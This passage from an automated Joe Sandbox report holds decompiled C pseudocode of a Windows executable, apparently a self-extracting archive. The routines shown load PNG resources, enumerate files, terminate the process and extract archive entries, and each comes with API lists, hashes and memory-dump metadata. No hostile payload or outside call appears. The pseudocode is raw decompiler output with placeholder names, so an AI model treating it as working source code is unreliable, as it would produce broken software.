                                                    				intOrPtr* _t39;
                                                    				long _t44;
                                                    				intOrPtr* _t45;
                                                    				struct HRSRC__* _t46;
                                                    
                                                    				_t46 = FindResourceW( *0xd01028, _a4, "PNG");
                                                    				if(_t46 == 0) {
                                                    					L15:
                                                    					return 0;
                                                    				}
                                                    				_t44 = SizeofResource( *0xd01028, _t46);
                                                    				if(_t44 == 0) {
                                                    					goto L15;
                                                    				}
                                                    				_t17 = LoadResource( *0xd01028, _t46);
                                                    				if(_t17 == 0) {
                                                    					goto L15;
                                                    				}
                                                    				_t18 = LockResource(_t17);
                                                    				_t47 = _t18;
                                                    				if(_t18 == 0) {
                                                    					goto L15;
                                                    				}
                                                    				_v4 = 0;
                                                    				_t19 = GlobalAlloc(2, _t44); // executed
                                                    				_t36 = _t19;
                                                    				if(_t36 == 0) {
                                                    					L14:
                                                    					return _v4;
                                                    				}
                                                    				if(GlobalLock(_t36) == 0) {
                                                    					L13:
                                                    					GlobalFree(_t36);
                                                    					goto L14;
                                                    				}
                                                    				E00CE0320(_t21, _t47, _t44);
                                                    				_v8 = 0;
                                                    				_push( &_v8);
                                                    				_push(0);
                                                    				_push(_t36);
                                                    				if( *0xd23180() == 0) {
                                                    					_t27 = E00CDA626(_t25, _t38, _v20, 0); // executed
                                                    					_t39 = _v28;
                                                    					_t45 = _t27;
                                                    					 *0xcf3278(_t39);
                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
                                                    					if(_t45 != 0) {
                                                    						 *((intOrPtr*)(_t45 + 8)) = 0;
                                                    						if( *((intOrPtr*)(_t45 + 8)) == 0) {
                                                    							_push(0xffffff);
                                                    							_t34 =  &_v20;
                                                    							_push(_t34);
                                                    							_push( *((intOrPtr*)(_t45 + 4)));
                                                    							L00CDEB26(); // executed
                                                    							if(_t34 != 0) {
                                                    								 *((intOrPtr*)(_t45 + 8)) = _t34;
                                                    							}
                                                    						}
                                                    						 *0xcf3278(1);
                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
                                                    					}
                                                    				}
                                                    				GlobalUnlock(_t36);
                                                    				goto L13;
                                                    			}

                                                    APIs
                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                    • LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                    • LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                    • GlobalLock.KERNEL32 ref: 00CDA73E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                      • Part of subcall function 00CDA626: GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                    • GlobalFree.KERNEL32 ref: 00CDA7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                    • String ID: PNG
                                                    • API String ID: 541704414-364855578
                                                    • Opcode ID: 3a5d4f3c4b5ec32a0dfd1d9f07aca38648492b79912ca546ff06321250c37f78
                                                    • Instruction ID: b1630b1cecd9fe471fb7be987c7451b9123abae896e4612ee5534265ed431519
                                                    • Opcode Fuzzy Hash: 3a5d4f3c4b5ec32a0dfd1d9f07aca38648492b79912ca546ff06321250c37f78
                                                    • Instruction Fuzzy Hash: 5E319175600342BFD7109F21EC88E2F7BB9EF84761B15451AFA15C2321EB31DD44DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1026 cca69b-cca6bf call cdec50 1029 cca727-cca730 FindNextFileW 1026->1029 1030 cca6c1-cca6ce FindFirstFileW 1026->1030 1031 cca742-cca7ff call cd0602 call ccc310 call cd15da * 3 1029->1031 1032 cca732-cca740 GetLastError 1029->1032 1030->1031 1033 cca6d0-cca6e2 call ccbb03 1030->1033 1037 cca804-cca811 1031->1037 1034 cca719-cca722 1032->1034 1040 cca6fe-cca707 GetLastError 1033->1040 1041 cca6e4-cca6fc FindFirstFileW 1033->1041 1034->1037 1043 cca709-cca70c 1040->1043 1044 cca717 1040->1044 1041->1031 1041->1040 1043->1044 1046 cca70e-cca711 1043->1046 1044->1034 1046->1044 1048 cca713-cca715 1046->1048 1048->1034
                                                    C-Code - Quality: 81%
                                                    			E00CCA69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
                                                    				intOrPtr _v572;
                                                    				intOrPtr _v580;
                                                    				intOrPtr _v588;
                                                    				struct _WIN32_FIND_DATAW _v596;
                                                    				short _v4692;
                                                    				int _t44;
                                                    				int _t49;
                                                    				signed int _t61;
                                                    				signed int _t62;
                                                    				void* _t63;
                                                    				long _t66;
                                                    				void* _t69;
                                                    				signed int _t78;
                                                    				void* _t79;
                                                    				intOrPtr _t80;
                                                    				void* _t81;
                                                    
                                                    				E00CDEC50(0x1250);
                                                    				_t81 = _a4;
                                                    				_t79 = _t78 | 0xffffffff;
                                                    				_push( &_v596);
                                                    				if(_t81 != _t79) {
                                                    					_t44 = FindNextFileW(_t81, ??);
                                                    					__eflags = _t44;
                                                    					if(_t44 != 0) {
                                                    						L12:
                                                    						_t80 = _a12;
                                                    						E00CD0602(_t80, _a8, 0x800);
                                                    						_push(0x800);
                                                    						E00CCC310(__eflags, _t80,  &(_v596.cFileName));
                                                    						_t49 = 0 + _v596.nFileSizeLow;
                                                    						__eflags = _t49;
                                                    						 *(_t80 + 0x1000) = _t49;
                                                    						asm("adc ecx, 0x0");
                                                    						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
                                                    						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
                                                    						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
                                                    						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
                                                    						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
                                                    						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
                                                    						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
                                                    						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
                                                    						E00CD15DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
                                                    						E00CD15DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
                                                    						E00CD15DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
                                                    						L13:
                                                    						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
                                                    						return _t81;
                                                    					}
                                                    					_t81 = _t79;
                                                    					_t61 = GetLastError();
                                                    					__eflags = _t61 - 0x12;
                                                    					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
                                                    					L9:
                                                    					_t80 = _a12;
                                                    					 *(_t80 + 0x1044) = _t62;
                                                    					goto L13;
                                                    				}
                                                    				_t63 = FindFirstFileW(_a8, ??); // executed
                                                    				_t81 = _t63;
                                                    				if(_t81 != _t79) {
                                                    					goto L12;
                                                    				}
                                                    				if(E00CCBB03(_a8,  &_v4692, 0x800) == 0) {
                                                    					L4:
                                                    					_t66 = GetLastError();
                                                    					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
                                                    						_t62 = 0;
                                                    						__eflags = 0;
                                                    					} else {
                                                    						_t62 = 1;
                                                    					}
                                                    					goto L9;
                                                    				}
                                                    				_t69 = FindFirstFileW( &_v4692,  &_v596); // executed
                                                    				_t81 = _t69;
                                                    				if(_t81 != _t79) {
                                                    					goto L12;
                                                    				}
                                                    				goto L4;
                                                    			}

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                      • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA728
                                                    • GetLastError.KERNEL32(?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA734
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                    • String ID:
                                                    • API String ID: 42610566-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CE7DEE(int _a4) {
                                                    				void* _t14;
                                                    				void* _t15;
                                                    				void* _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    
                                                    				if(E00CEB076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                    					TerminateProcess(GetCurrentProcess(), _a4);
                                                    				}
                                                    				E00CE7E73(_t15, _a4);
                                                    				ExitProcess(_a4);
                                                    			}

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7E0F
                                                    • TerminateProcess.KERNEL32(00000000,?,00CE7DC4,?,00CFC300,0000000C,00CE7F1B,?,00000002,00000000), ref: 00CE7E16
                                                    • ExitProcess.KERNEL32 ref: 00CE7E28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 56%
                                                    			E00CC848E(intOrPtr __ecx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr _t383;
                                                    				signed int _t387;
                                                    				signed int _t392;
                                                    				signed int _t398;
                                                    				void* _t400;
                                                    				signed int _t401;
                                                    				signed int _t405;
                                                    				signed int _t406;
                                                    				intOrPtr _t407;
                                                    				signed int _t411;
                                                    				signed int _t416;
                                                    				signed int _t417;
                                                    				signed int _t421;
                                                    				signed int _t431;
                                                    				signed int _t432;
                                                    				signed int _t435;
                                                    				signed int _t436;
                                                    				signed int _t442;
                                                    				signed int _t445;
                                                    				signed int _t446;
                                                    				char _t448;
                                                    				signed int _t449;
                                                    				signed int _t450;
                                                    				signed int _t473;
                                                    				signed int _t482;
                                                    				intOrPtr _t485;
                                                    				signed int _t495;
                                                    				char _t500;
                                                    				char _t501;
                                                    				void* _t508;
                                                    				void* _t515;
                                                    				void* _t517;
                                                    				signed int _t525;
                                                    				signed int _t529;
                                                    				signed int _t530;
                                                    				signed int _t531;
                                                    				signed int _t534;
                                                    				signed int _t536;
                                                    				signed int _t543;
                                                    				signed int _t552;
                                                    				signed int _t554;
                                                    				signed int _t556;
                                                    				signed int _t558;
                                                    				signed char _t559;
                                                    				signed int _t562;
                                                    				void* _t567;
                                                    				signed int _t573;
                                                    				intOrPtr* _t582;
                                                    				signed int _t585;
                                                    				signed int _t586;
                                                    				signed int _t595;
                                                    				signed int _t596;
                                                    				intOrPtr _t599;
                                                    				signed int _t602;
                                                    				signed int _t611;
                                                    				signed int _t613;
                                                    				signed int _t616;
                                                    				signed int _t619;
                                                    				signed int _t621;
                                                    				signed int _t622;
                                                    				signed int _t624;
                                                    				signed int _t625;
                                                    				signed int _t628;
                                                    				void* _t637;
                                                    				intOrPtr _t645;
                                                    				char _t646;
                                                    				signed int _t649;
                                                    				signed int _t650;
                                                    				void* _t657;
                                                    				void* _t658;
                                                    				signed int _t675;
                                                    				intOrPtr _t686;
                                                    				void* _t688;
                                                    				signed int _t689;
                                                    				signed int _t690;
                                                    				signed int _t691;
                                                    				signed int _t692;
                                                    				signed int _t695;
                                                    				intOrPtr _t697;
                                                    				signed int _t702;
                                                    				signed int _t704;
                                                    				signed int _t707;
                                                    				void* _t712;
                                                    				signed int _t713;
                                                    				signed int _t716;
                                                    				signed int _t717;
                                                    				void* _t719;
                                                    				void* _t721;
                                                    				void* _t723;
                                                    				void* _t725;
                                                    
                                                    				E00CDEB78(0xcf2858, _t721);
                                                    				E00CDEC50(0x60ac);
                                                    				_t582 =  *((intOrPtr*)(_t721 + 8));
                                                    				_t684 = 0;
                                                    				_t697 = __ecx;
                                                    				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
                                                    				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
                                                    				 *(_t721 - 0x18) = _t585;
                                                    				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
                                                    					_t704 = __ecx + 0x10;
                                                    					 *(_t721 - 0x20) = _t704;
                                                    					L5:
                                                    					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
                                                    					if(_t383 == 2) {
                                                    						 *(_t697 + 0x10ff) = _t684;
                                                    						__eflags =  *(_t582 + 0x32f4) - _t684;
                                                    						if(__eflags > 0) {
                                                    							L22:
                                                    							__eflags =  *(_t582 + 0x32fc) - _t684;
                                                    							if(__eflags > 0) {
                                                    								L26:
                                                    								_t586 =  *(_t697 + 8);
                                                    								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
                                                    								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
                                                    									L29:
                                                    									 *(_t721 - 0x13) = _t684;
                                                    									_t37 = _t721 - 0x60b8; // -22712
                                                    									_t38 = _t721 - 0x13; // 0x7ed
                                                    									_t387 = E00CC5D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
                                                    									__eflags = _t387;
                                                    									 *(_t721 - 0x11) = _t387 != 0;
                                                    									__eflags = _t387;
                                                    									if(_t387 != 0) {
                                                    										__eflags =  *(_t721 - 0x13);
                                                    										if( *(_t721 - 0x13) == 0) {
                                                    											__eflags = 0;
                                                    											 *((char*)(_t697 + 0xf9)) = 0;
                                                    										}
                                                    									}
                                                    									E00CC2112(_t582);
                                                    									_push(0x800);
                                                    									_t43 = _t721 - 0x30b8; // -10424
                                                    									_push(_t582 + 0x22c0);
                                                    									E00CCB76C(_t582);
                                                    									__eflags =  *((char*)(_t582 + 0x338b));
                                                    									 *(_t721 - 0x24) = 1;
                                                    									if( *((char*)(_t582 + 0x338b)) == 0) {
                                                    										_t392 = E00CC2209(_t582);
                                                    										__eflags = _t392;
                                                    										if(_t392 == 0) {
                                                    											_t559 =  *(_t697 + 8);
                                                    											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
                                                    											asm("sbb al, al");
                                                    											_t61 = _t721 - 0x11;
                                                    											 *_t61 =  *(_t721 - 0x11) &  !_t559;
                                                    											__eflags =  *_t61;
                                                    										}
                                                    									} else {
                                                    										_t562 =  *( *(_t697 + 8) + 0x82c4);
                                                    										__eflags = _t562 - 1;
                                                    										if(_t562 != 1) {
                                                    											__eflags =  *(_t721 - 0x13);
                                                    											if( *(_t721 - 0x13) == 0) {
                                                    												__eflags = _t562;
                                                    												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
                                                    												_push(0);
                                                    												_t54 = _t721 - 0x30b8; // -10424
                                                    												_t567 = E00CCC249(_t54);
                                                    												_t675 =  *(_t697 + 8);
                                                    												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
                                                    												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
                                                    													 *(_t721 - 0x11) = 0;
                                                    												} else {
                                                    													_t57 = _t721 - 0x30b8; // -10424
                                                    													_push(1);
                                                    													E00CCC249(_t57);
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
                                                    									 *((char*)(_t697 + 0x68)) = 0;
                                                    									asm("sbb eax, [ebx+0x32f4]");
                                                    									 *0xcf3278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
                                                    									 *((intOrPtr*)( *_t582 + 0x10))();
                                                    									_t685 = 0;
                                                    									_t398 = 0;
                                                    									_t595 = 0;
                                                    									 *(_t721 - 0xd) = 0;
                                                    									 *(_t721 - 0x28) = 0;
                                                    									__eflags =  *(_t582 + 0x3333);
                                                    									if( *(_t582 + 0x3333) == 0) {
                                                    										L44:
                                                    										__eflags =  *(_t721 - 0x11) - _t595;
                                                    										if( *(_t721 - 0x11) != _t595) {
                                                    											L47:
                                                    											_t707 =  *(_t721 - 0x18);
                                                    											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
                                                    											_t400 = 0x49;
                                                    											__eflags = _t596;
                                                    											if(_t596 == 0) {
                                                    												L49:
                                                    												_t401 = _t685;
                                                    												L50:
                                                    												__eflags = _t596;
                                                    												_t88 = _t721 - 0x30b8; // -10424
                                                    												_t405 = L00CD1B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
                                                    												__eflags = _t405;
                                                    												if(__eflags == 0) {
                                                    													L14:
                                                    													_t406 = 0;
                                                    													__eflags = 0;
                                                    													L15:
                                                    													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
                                                    													return _t406;
                                                    												}
                                                    												_push(0x800);
                                                    												_t407 = _t697 + 0x1100;
                                                    												_push(_t407);
                                                    												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
                                                    												_t91 = _t721 - 0x30b8; // -10424
                                                    												_push(_t582);
                                                    												E00CC8167(__eflags);
                                                    												__eflags =  *(_t721 - 0xd);
                                                    												if( *(_t721 - 0xd) != 0) {
                                                    													L54:
                                                    													 *(_t721 - 0xe) = 0;
                                                    													L55:
                                                    													_t411 =  *(_t697 + 8);
                                                    													_t599 = 0x45;
                                                    													__eflags =  *((char*)(_t411 + 0x715b));
                                                    													_t686 = 0x58;
                                                    													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
                                                    													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
                                                    													if( *((char*)(_t411 + 0x715b)) != 0) {
                                                    														L57:
                                                    														__eflags = _t707 - _t599;
                                                    														if(_t707 == _t599) {
                                                    															L59:
                                                    															_t102 = _t721 - 0x20b8; // -6328
                                                    															E00CC6EDB(_t102);
                                                    															_push(0);
                                                    															_t103 = _t721 - 0x20b8; // -6328
                                                    															_t416 = E00CCA56D(_t102, __eflags, _t697 + 0x1100, _t103);
                                                    															__eflags = _t416;
                                                    															if(_t416 == 0) {
                                                    																_t417 =  *(_t697 + 8);
                                                    																__eflags =  *((char*)(_t417 + 0x715b));
                                                    																_t114 = _t721 - 0xe;
                                                    																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
                                                    																__eflags =  *_t114;
                                                    																L65:
                                                    																_t116 = _t721 - 0x30b8; // -10424
                                                    																_t421 = E00CC7C0D(_t582, _t116);
                                                    																__eflags = _t421;
                                                    																if(_t421 != 0) {
                                                    																	while(1) {
                                                    																		__eflags =  *(_t582 + 0x3333);
                                                    																		if( *(_t582 + 0x3333) == 0) {
                                                    																			goto L69;
                                                    																		}
                                                    																		_t121 = _t721 - 0x30b8; // -10424
                                                    																		_t552 = E00CC8117(_t697, _t582, _t121);
                                                    																		__eflags = _t552;
                                                    																		if(_t552 == 0) {
                                                    																			 *((char*)(_t697 + 0x2100)) = 1;
                                                    																			goto L14;
                                                    																		}
                                                    																		L69:
                                                    																		_t123 = _t721 - 0x1174; // -2420
                                                    																		_t602 = 0x40;
                                                    																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
                                                    																		_t725 = _t723 + 0xc;
                                                    																		asm("movsw");
                                                    																		_t125 = _t721 - 0x2c; // 0x7d4
                                                    																		 *(_t721 - 4) = 0;
                                                    																		asm("sbb ecx, ecx");
                                                    																		_t132 = _t721 - 0x1174; // -2420
                                                    																		E00CCD051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
                                                    																		__eflags =  *(_t582 + 0x3333);
                                                    																		if( *(_t582 + 0x3333) == 0) {
                                                    																			L77:
                                                    																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                                                    																			L78:
                                                    																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                                                    																			_t153 = _t721 - 0x1174; // -2420
                                                    																			L00CCF204(_t153);
                                                    																			_t154 = _t721 - 0x1070; // -2160
                                                    																			E00CC9556(_t154);
                                                    																			_t611 =  *(_t582 + 0x3398);
                                                    																			_t431 = 1;
                                                    																			 *(_t721 - 0x20) = _t611;
                                                    																			 *(_t721 - 4) = 1;
                                                    																			_t688 = 0x50;
                                                    																			__eflags = _t611;
                                                    																			if(_t611 == 0) {
                                                    																				L88:
                                                    																				_t432 = E00CC2209(_t582);
                                                    																				__eflags = _t432;
                                                    																				if(_t432 == 0) {
                                                    																					_t613 =  *(_t721 - 0xe);
                                                    																					__eflags = _t613;
                                                    																					if(_t613 == 0) {
                                                    																						L98:
                                                    																						_t431 = 1;
                                                    																						__eflags = 1;
                                                    																						L99:
                                                    																						__eflags =  *(_t582 + 0x6ccc);
                                                    																						if(__eflags == 0) {
                                                    																							__eflags = _t613;
                                                    																							if(_t613 == 0) {
                                                    																								L218:
                                                    																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                                                    																								_t368 = _t721 - 0x1070; // -2160
                                                    																								_t398 = E00CC959A(_t368);
                                                    																								__eflags =  *(_t721 - 0x11);
                                                    																								_t595 =  *(_t721 - 0xe);
                                                    																								_t689 =  *(_t721 - 0xd);
                                                    																								if( *(_t721 - 0x11) != 0) {
                                                    																									_t372 = _t697 + 0xf4;
                                                    																									 *_t372 =  *(_t697 + 0xf4) + 1;
                                                    																									__eflags =  *_t372;
                                                    																								}
                                                    																								L220:
                                                    																								__eflags =  *((char*)(_t697 + 0x68));
                                                    																								if( *((char*)(_t697 + 0x68)) != 0) {
                                                    																									goto L14;
                                                    																								}
                                                    																								__eflags = _t595;
                                                    																								if(_t595 != 0) {
                                                    																									L17:
                                                    																									_t406 = 1;
                                                    																									goto L15;
                                                    																								}
                                                    																								__eflags =  *(_t582 + 0x6ccc) - _t595;
                                                    																								if( *(_t582 + 0x6ccc) == _t595) {
                                                    																									L9:
                                                    																									E00CC1F47(_t582);
                                                    																									goto L17;
                                                    																								}
                                                    																								__eflags = _t689;
                                                    																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
                                                    																								goto L15;
                                                    																							}
                                                    																							L104:
                                                    																							_t616 =  *(_t721 - 0x18);
                                                    																							L105:
                                                    																							_t435 =  *(_t697 + 8);
                                                    																							__eflags =  *((char*)(_t435 + 0x7201));
                                                    																							if( *((char*)(_t435 + 0x7201)) == 0) {
                                                    																								L107:
                                                    																								_t436 =  *(_t721 - 0xd);
                                                    																								__eflags = _t436;
                                                    																								if(_t436 != 0) {
                                                    																									L112:
                                                    																									 *((char*)(_t721 - 0x12)) = 1;
                                                    																									__eflags = _t436;
                                                    																									if(_t436 != 0) {
                                                    																										L114:
                                                    																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
                                                    																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
                                                    																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
                                                    																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
                                                    																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
                                                    																										E00CCAB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
                                                    																										E00CCAB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
                                                    																										_t442 =  *(_t582 + 0x32f0);
                                                    																										_t712 = _t697 + 0x10;
                                                    																										_t619 =  *(_t582 + 0x32f4);
                                                    																										 *(_t697 + 0x38) = _t442;
                                                    																										 *(_t697 + 0x30) = _t442;
                                                    																										_t222 = _t721 - 0x1070; // -2160
                                                    																										 *(_t697 + 0x3c) = _t619;
                                                    																										 *(_t697 + 0x34) = _t619;
                                                    																										E00CCD099(_t712, _t582, _t222);
                                                    																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
                                                    																										_t690 = 0;
                                                    																										_t445 =  *(_t721 - 0xd);
                                                    																										 *((char*)(_t697 + 0x41)) = _t621;
                                                    																										 *((char*)(_t697 + 0x42)) = _t445;
                                                    																										 *(_t721 - 0x28) = 0;
                                                    																										 *(_t721 - 0x24) = 0;
                                                    																										__eflags = _t621;
                                                    																										if(_t621 != 0) {
                                                    																											L132:
                                                    																											_t622 =  *(_t697 + 8);
                                                    																											__eflags =  *((char*)(_t622 + 0x71a0));
                                                    																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
                                                    																											__eflags =  *((char*)(_t721 - 0x12));
                                                    																											if( *((char*)(_t721 - 0x12)) != 0) {
                                                    																												L136:
                                                    																												_t446 = _t690;
                                                    																												 *((char*)(_t721 - 0x10)) = _t690;
                                                    																												L137:
                                                    																												__eflags =  *(_t721 - 0x20);
                                                    																												 *((char*)(_t721 - 0x14)) = 1;
                                                    																												 *((char*)(_t721 - 0xf)) = 1;
                                                    																												if( *(_t721 - 0x20) == 0) {
                                                    																													__eflags =  *(_t582 + 0x3330);
                                                    																													if( *(_t582 + 0x3330) == 0) {
                                                    																														__eflags =  *((char*)(_t582 + 0x22b8));
                                                    																														if(__eflags != 0) {
                                                    																															_push( *(_t582 + 0x3388) & 0x000000ff);
                                                    																															_push( *((intOrPtr*)(_t582 + 0x338c)));
                                                    																															E00CD3377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
                                                    																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
                                                    																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
                                                    																															__eflags = 0;
                                                    																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
                                                    																															 *((char*)(_t485 + 0x4c60)) = 0;
                                                    																															E00CD3020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
                                                    																														} else {
                                                    																															_push( *(_t582 + 0x32fc));
                                                    																															_push( *(_t582 + 0x32f8));
                                                    																															_push(_t712);
                                                    																															E00CC9215(_t582, _t697, __eflags);
                                                    																														}
